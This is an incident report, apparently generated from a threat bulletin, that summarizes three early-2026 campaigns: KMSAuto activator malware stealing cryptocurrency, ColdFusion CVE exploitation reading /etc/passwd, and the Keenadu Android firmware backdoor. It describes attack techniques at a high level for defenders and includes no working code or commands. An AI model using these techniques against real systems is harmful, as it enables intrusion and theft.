Full Report
The first ThreatsDay Bulletin of 2026 lands on a day that already feels symbolic — new year, new breaches, new tricks. If the past twelve months taught defenders anything, it’s that threat actors don’t pause for holidays or resolutions. They just evolve faster. This week’s round-up shows how subtle shifts in behavior, from code tweaks to job scams, are rewriting what “cybercrime” looks like in
Analysis Summary
# Incident Report: Compilation of Early 2026 Threat Activities
## Executive Summary
This report summarizes multiple distinct threat activities identified in the first ThreatsDay Bulletin of 2026. The incidents range from sophisticated malware distribution via illegal software activation lures (`KMSAuto`), to widespread exploitation of vulnerability-riddled servers (`ColdFusion`), and discovery of pre-installed malware on consumer devices (`Android`). The overarching theme is the calculated evolution of threat actor tactics, exploiting both digital infrastructure configuration weaknesses and social engineering vectors (e.g., fake software).
## Incident Details
- Discovery Date: January 1, 2026 (Date of Bulletin Publication)
- Incident Date: Spans between April 2020 – January 2023 (KMSAuto); Over Christmas 2025 holiday period (ColdFusion)
- Affected Organization: Multiple, unspecific global organizations/users (KMSAuto, ColdFusion); Various Android tablet manufacturers/users (Keenadu)
- Sector: Software, End-User Computing, Various (Specific targets of exploitation)
- Geography: Global (Lithuania/South Korea jurisdiction for arrest; Exploitation traffic across U.S., Spain, India, Canada, Chile, Germany, etc.)
## Timeline of Events
### Initial Access
- Date/Time: April 2020 – January 2023 (KMSAuto); Christmas 2025 Holiday Period (ColdFusion)
- Vector: Disguised downloads (KMSAuto); Unpatched vulnerabilities (ColdFusion)
- Details:
* **KMSAuto:** Threat actor distributed malware disguised as legitimate Key Management Service (KMS) activation tools for Windows/Office, tricking 2.8 million users into downloading a malicious executable.
* **ColdFusion:** A single threat actor systematically exploited over 10 known Adobe ColdFusion CVEs from 2023 and 2024.
### Lateral Movement
- **ColdFusion:** Payloads deployed subsequent to exploitation were observed enabling direct code execution and JNDI lookups, suggesting preparation for deeper network traversal or resource access.
### Data Exfiltration/Impact
- **KMSAuto:** Stole virtual assets (cryptocurrency) from users across 3,100 virtual asset addresses, totaling approximately KRW 1.7 billion ($1.2 million) across 8,400 transactions.
- **Keenadu (Android):** The discovered backdoored library (`libandroid_runtime.so`) implies potential for remote access, data exfiltration, and command execution on affected tablets.
- **ColdFusion:** Credential harvesting (specifically accessing `/etc/passwd`) was noted as part of the exploitation routine.
### Detection & Response
- **KMSAuto:** The campaign was identified, leading to the arrest and extradition of the 29-year-old Lithuanian national involved by South Korean authorities.
- **ColdFusion:** Detected via analysis by GreyNoise tracking coordinated exploitation traffic originating primarily from Japan-based infrastructure.
- **Keenadu:** Discovered through forensic analysis by Kaspersky researchers.
## Attack Methodology
Since this is a summary of multiple independent incidents, methodologies are specific:
- **Initial Access:** Social Engineering/Trojanized Software (KMSAuto); Exploitation of known CVEs (ColdFusion).
- **Persistence:** Not explicitly stated for exploitation incidents, but the **Keenadu** malware suggests system-level persistence via a backdoored library.
- **Privilege Escalation:** Not detailed, but implied by access to OS files (`/etc/passwd`) and code execution capabilities in ColdFusion exploits.
- **Defense Evasion:** Use of seemingly legitimate software wrappers (KMSAuto) to bypass security controls.
- **Credential Access:** Direct file access to configuration/credential stores (`/etc/passwd` harvested in ColdFusion attacks).
- **Discovery:** Not detailed, but exploitation often includes C2 beaconing or system checks.
- **Lateral Movement:** **ColdFusion payloads** enabled direct code execution necessary for movement.
- **Collection:** Clipboard-stealing (KMSAuto); System file access (ColdFusion).
- **Exfiltration:** Direct theft of virtual assets (KMSAuto).
- **Impact:** Financial theft (KMSAuto); System control/data access (ColdFusion/Keenadu).
## Impact Assessment
- **Financial:** Significant direct financial loss identified in the KMSAuto campaign ($1.2 million in stolen digital assets).
- **Data Breach:** Harvesting of system credentials (`/etc/passwd`) and potential PII/data exfiltration due to backdoors (Keenadu).
- **Operational:** Exposure of enterprise ColdFusion servers to sustained, systematic exploitation, risking full system compromise.
- **Reputational:** Negative impact on users who downloaded malicious software (KMSAuto) or purchased backdoored hardware (Keenadu).
## Indicators of Compromise
*Note: No specific indicators (IPs/Hashes) were provided in the summary text, only CVEs and observed attack source regions.*
- **Network indicators:** Coordinated exploitation traffic observed originating primarily from Japanese IP infrastructure (for ColdFusion).
- **File indicators:** Malicious executable disguised as KMSAuto software. Backdoor found in `libandroid_runtime.so` (Keenadu).
- **Behavioral indicators:** Leveraging JNDI lookups post-exploitation.
## Response Actions
- **Containment:** Coordinated international action leading to the arrest and extradition of the primary KMSAuto distributor.
- **Eradication:** Public disclosure and analysis by security researchers (Kaspersky, GreyNoise) enabling others to patch or remove threats.
- **Recovery:** Not detailed, but immediate patching of actively exploited ColdFusion CVEs would be required.
## Lessons Learned
- **Software Lures Persist:** Criminals continue to successfully leverage high-demand "cracked" software (KMSAuto) as an extremely effective initial access vector, netting significant returns over a long timeframe (2020-2023).
- **Patch Backlog Exploitation:** Threat actors capitalize on holiday downtimes or slow organizational response to systematically exploit known, older vulnerabilities (10+ CVEs from 2023-2024 targeted over Christmas 2025).
- **Supply Chain Risk:** Pre-installed malware on hardware (Keenadu on Android tablets) represents a hard-to-detect, deep layer of compromise.
## Recommendations
- **Vulnerability Management:** Prioritize patching high-impact, internet-facing services like Adobe ColdFusion immediately, especially concerning any known RCEs or RCE precursors.
- **Endpoint Security:** Implement enhanced EDR/AV inspection for software installations, particularly around activation utilities or commonly pirated software.
- **Hardware Trust:** Establish stronger security protocols for validating the integrity of consumer hardware and pre-installed applications before deployment in corporate environments or by employees.